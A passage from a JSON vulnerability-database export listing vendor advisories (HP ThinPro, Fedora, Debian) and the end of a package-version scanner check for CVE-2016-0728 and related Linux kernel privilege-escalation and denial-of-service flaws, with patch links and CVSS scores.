isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "hp": [{"lastseen": "2020-10-13T01:01:48", "bulletinFamily": "software", "cvelist": ["CVE-2016-0758", "CVE-2016-0728"], "description": "## Potential Security Impact\nElevated Privileges\n\n**Source:** Hewlett\u00adPackard Company, HP Software Security Response Team \n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified with certain HP Thin Clients running ThinPro OS. The vulnerability could be exploited exploited locally resulting in elevated privileges.\n\n## RESOLUTION\nHP has released the following software updates to resolve the vulnerability. Patches for the affected version of HP ThinPro can be found through the links below:\n\n * [HP ThinPro 5.2.1](<http://ftp.hp.com/pub/tcdebian/updates/5.2.1/service_packs/CVE-2016-0728-3.0-all-5.2.1-x86-SQ.xar>)\n\n * [HP ThinPro 5.2](<http://ftp.hp.com/pub/tcdebian/updates/5.2/service_packs/CVE-2016-0758-1.0-all-5.2-x86-SQ.xar>)\n\n * [HP ThinPro 5.1](<http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/CVE-2016-0728-3.0-all-5.0-5.1-x86-SQ.xar>)\n\n * [HP ThinPro 5.0](<http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/CVE-2016-0728-3.0-all-5.0-5.1-x86-SQ.xar>)\n\n * [HP ThinPro 4.4](<http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/CVE-2016-0758-1.0-all-4.4-x86-SQ.xar>)\n", "edition": 2, "modified": "2017-07-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "HP:C05018265", "href": "https://support.hp.com/us-en/document/c05018265", "title": "HPSBHF03436 rev.2 - HP Thin Client with ThinPro OS, running Linux, Local Elevated Privileges", "type": "hp", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7513", "CVE-2015-7566", "CVE-2016-0728"], "description": "The kernel meta package ", "modified": "2016-01-26T18:29:15", "published": "2016-01-26T18:29:15", "id": "FEDORA:A5C89601FC0F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.3.3-303.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:09:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0723", "CVE-2016-0728", "CVE-2015-8767", "CVE-2013-4312", "CVE-2015-7566"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3448-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 19, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2013-4312 CVE-2015-7566 CVE-2015-8767 CVE-2016-0723\n CVE-2016-0728\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation or denial-of-service.\n\nCVE-2013-4312\n\n Tetsuo Handa discovered that it is possible for a process to open\n far more files than the process' limit leading to denial-of-service\n conditions.\n\nCVE-2015-7566\n\n Ralf Spenneberg of OpenSource Security reported that the visor\n driver crashes when a specially crafted USB device without bulk-out\n endpoint is detected.\n\nCVE-2015-8767\n\n An SCTP denial-of-service was discovered which can be triggered by a\n local attacker during a heartbeat timeout event after the 4-way\n handshake.\n\nCVE-2016-0723\n\n A use-after-free vulnerability was discovered in the TIOCGETD ioctl.\n A local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0728\n\n The Perception Point research team discovered a use-after-free\n vulnerability in the keyring facility, possibly leading to local\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.7-ckt20-1+deb8u3.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 18, "modified": "2016-01-19T12:40:28", "published": "2016-01-19T12:40:28", "id": "DEBIAN:DSA-3448-1:C7742", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00018.html", "title": "[SECURITY] [DSA 3448-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
